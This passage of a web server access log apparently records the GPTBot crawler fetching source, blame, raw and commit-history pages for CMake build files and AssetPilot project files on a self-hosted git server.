Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39743] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39745] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11194] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14296] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11100] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9949] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10022] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20388] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin" [Client 74.7.227.38] [Length 48507] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:15:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:15:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13519] [Gzip 5.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:15:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fdocker-compose.yml" [Client 74.7.227.38] [Length 26541] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fwatchfiles" [Client 74.7.227.38] [Length 24075] [Gzip 